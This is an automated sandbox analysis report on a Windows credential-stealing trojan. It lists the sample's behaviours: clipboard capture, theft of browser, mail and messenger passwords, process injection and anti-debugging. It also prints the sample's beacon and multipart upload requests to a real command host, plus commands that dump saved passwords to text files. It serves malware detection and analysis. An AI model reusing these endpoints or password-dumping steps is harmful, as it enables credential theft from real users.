Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:35743
Start time:22:54:52
Joe Sandbox Product:CloudBasic
Start date:31.10.2017
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:55SKM_C281171022232400.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal76.evad.phis.spyw.troj.winEXE@7/3@1/1
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 111
  • Number of non-executed functions: 259
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 98.8% (good quality ratio 95.4%)
  • Quality average: 85.1%
  • Quality standard deviation: 24.2%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): svchost.exe, WmiApSrv.exe, dllhost.exe
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: 55SKM_C281171022232400.exe, 55SKM_C281171022232400.exe


Detection

StrategyScoreRangeReportingDetection
Threshold760 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Signature Overview

Click to jump to signature section


Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_0040ABFF GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,4_2_0040ABFF
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeWindow created: window name: CLIPBRDWNDCLASS

Networking:

barindex
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /ph7cms/data/system/modules/web/post.php?type=notification&machinename=473627&machinetime=10:56%20PM HTTP/1.1Host: alsharfigroup.comConnection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: 55SKM_C281171022232400.exeString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Fa
Source: 55SKM_C281171022232400.exeString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo
Source: 55SKM_C281171022232400.exeString found in binary or memory: Hotmail/MSN equals www.hotmail.com (Hotmail)
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: alsharfigroup.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: GET /ph7cms/data/system/modules/web/post.php?type=notification&machinename=473627&machinetime=10:56%20PM HTTP/1.1Host: alsharfigroup.comConnection: Keep-Alive
Urls found in memory or binary dataShow sources
Source: 55SKM_C281171022232400.exeString found in binary or memory: file://
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Users/Sam
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwel
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/en/ECX%20alsharfigroup.resources/ECX%20alsharfigroup.resource
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Windows/assembl
Source: 55SKM_C281171022232400.exeString found in binary or memory: ftp://
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://alsharfigroup.com
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://alsharfigroup.com/ph7cms/data/system/modules/web/
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://alsharfigroup.com/ph7cms/data/system/modules/web/post.php?type=notification&machinename=47362
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://go.micr
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://https://:stringdatawininetcachecredentialsftp://dpapi:captionmenu_%ddialog_%dstringsgeneralsy
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://ns.adobe.A
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://ns.adobe.c/se
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://www.facebook.com/
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://www.nirsoft.net/
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://dmp.theadex.com/r/104/2491/?c=10011142920
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://login.yahoo.com/config/login
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/l
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /ph7cms/data/system/modules/web/post.php?type=notification&machinename=473627&machinetime=10:56%20PM HTTP/1.1Host: alsharfigroup.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /ph7cms/data/system/modules/web/image/upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8d520b2906d1d70Host: alsharfigroup.comContent-Length: 1672888Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /ph7cms/data/system/modules/web/image/upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8d520b2cd604d00Host: alsharfigroup.comContent-Length: 1672469Expect: 100-continue

Stealing of Sensitive Information:

barindex
Searches for Windows Mail specific filesShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\wazh7fcp.default\secmod.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\secmod.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\places.sqlite
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\cert8.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\wazh7fcp.default\cert8.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\wazh7fcp.default\cert7.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\key3.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to steal Instant Messenger accounts or passwordsShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Paltalk
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Google\Google Talk\Accounts
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Identities\{894C55D4-9D8A-49AE-A9C5-628BB0C1BD8F}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Microsoft\Windows Live Mail
Tries to steal Mail credentials (via file registry)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword4_2_00402D59
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword4_2_00402D59
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: ESMTPPassword4_2_00403396
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword4_1_00402D59
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword4_1_00402D59
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: ESMTPPassword4_1_00403396

Data Obfuscation:

barindex
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .text entropy: 6.92902039348
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_004047D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,4_2_004047D8
PE file contains an invalid checksumShow sources
Source: 55SKM_C281171022232400.exeStatic PE information: real checksum: 0xfdd0f should be: 0xfc9ff
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00411939 push ecx; ret 4_2_00411949
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00411960 push eax; ret 4_2_00411974
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00411960 push eax; ret 4_2_0041199C
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00411939 push ecx; ret 4_1_00411949
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00411960 push eax; ret 4_1_00411974
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00411960 push eax; ret 4_1_0041199C
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00449C94 push eax; iretd 5_2_00449C95
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00447E64 push eax; ret 5_2_00447E71
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004433C0 push eax; ret 5_2_004433D4
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004433C0 push eax; ret 5_2_004433FC
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00444B2C push eax; iretd 5_2_00444B2D
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004431A1 push ecx; ret 5_2_004431B1
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00449C94 push eax; iretd 5_1_00449C95
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00447E64 push eax; ret 5_1_00447E71
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004433C0 push eax; ret 5_1_004433D4
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004433C0 push eax; ret 5_1_004433FC
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00444B2C push eax; iretd 5_1_00444B2D
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004431A1 push ecx; ret 5_1_004431B1

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00406E64 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00406E64
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00406E64 FindFirstFileA,FindNextFileA,strlen,strlen,4_1_00406E64
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,5_2_00408752
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004080D9 FindFirstFileW,FindNextFileW,FindClose,5_2_004080D9
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,5_1_00408752
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004080D9 FindFirstFileW,FindNextFileW,FindClose,5_1_004080D9

System Summary:

barindex
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Uses new MSVCR DllsShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: mscorrc.pdb source: 55SKM_C281171022232400.exe
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: 55SKM_C281171022232400.exe
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 55SKM_C281171022232400.exe
Classification labelShow sources
Source: classification engineClassification label: mal76.evad.phis.spyw.troj.winEXE@7/3@1/1
Contains functionality for error loggingShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00416421 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_00416421
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004168AB GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,5_2_004168AB
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00411AB8 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,5_2_00411AB8
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_0040ED94 FindResourceA,SizeofResource,LoadResource,LockResource,4_2_0040ED94
PE file has an executable .text section and no other executable sectionShow sources
Source: 55SKM_C281171022232400.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSection loaded: C:\Windows\System32\msvbvm60.dll
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini filesShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Reads software policiesShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary dataShow sources
Source: 55SKM_C281171022232400.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 55SKM_C281171022232400.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: 55SKM_C281171022232400.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 55SKM_C281171022232400.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 55SKM_C281171022232400.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 55SKM_C281171022232400.exeBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 55SKM_C281171022232400.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe'
Source: unknownProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe'
Source: unknownProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe' /stext C:\ProgramData\Mails.txt
Source: unknownProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe' /stext C:\ProgramData\Browsers.txt
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe'
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe' /stext C:\ProgramData\Mails.txt
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe' /stext C:\ProgramData\Browsers.txt
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Creates mutexesShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 0042DF27 appears 32 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00414751 appears 68 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00442E9E appears 38 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00411672 appears 32 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00407974 appears 58 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 004433C0 appears 74 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00442E8C appears 34 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 0041163C appears 68 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00411960 appears 34 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00414AFA appears 176 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 004148B2 appears 132 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 004115F2 appears 34 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00442EAA appears 66 times
PE file contains strange resourcesShow sources
Source: 55SKM_C281171022232400.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version infoShow sources
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameuser32j% vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameECX alsharfigroup.exe4 vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameMSCTF.DLL.MUIj% vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameECX alsharfigroup.exe4 vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamemscorrc.dllT vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamemscorwks.dllT vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameKernelbasej% vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilename vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFileName vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile read: C:\Users\user\Desktop\55SKM_C281171022232400.exe
Potential malicious icon foundShow sources
Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: 55SKM_C281171022232400.exeBinary or memory string: %kJIProgram Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: Program ManagerP
Source: 55SKM_C281171022232400.exeBinary or memory string: Program Managerh1%k
Source: 55SKM_C281171022232400.exeBinary or memory string: Window title: Program Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: Progman
Source: 55SKM_C281171022232400.exeBinary or memory string: w title: Program Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: Program Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: %k%$Window title: Program Manager End:] 0j
Source: 55SKM_C281171022232400.exeBinary or memory string: Program ManagerX
Source: 55SKM_C281171022232400.exeBinary or memory string: Program Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: Program Manager
Source: 55SKM_C281171022232400.exeBinary or memory string: Shell_TrayWnd
Source: 55SKM_C281171022232400.exeBinary or memory string: %kLKProgram Manager End:]
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMemory written: C:\Users\user\Desktop\55SKM_C281171022232400.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMemory written: C:\Users\user\Desktop\55SKM_C281171022232400.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread register set: target process: 3280

Anti Debugging:

barindex
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSystem information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_004047D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,4_2_004047D8
Enables debug privilegesShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
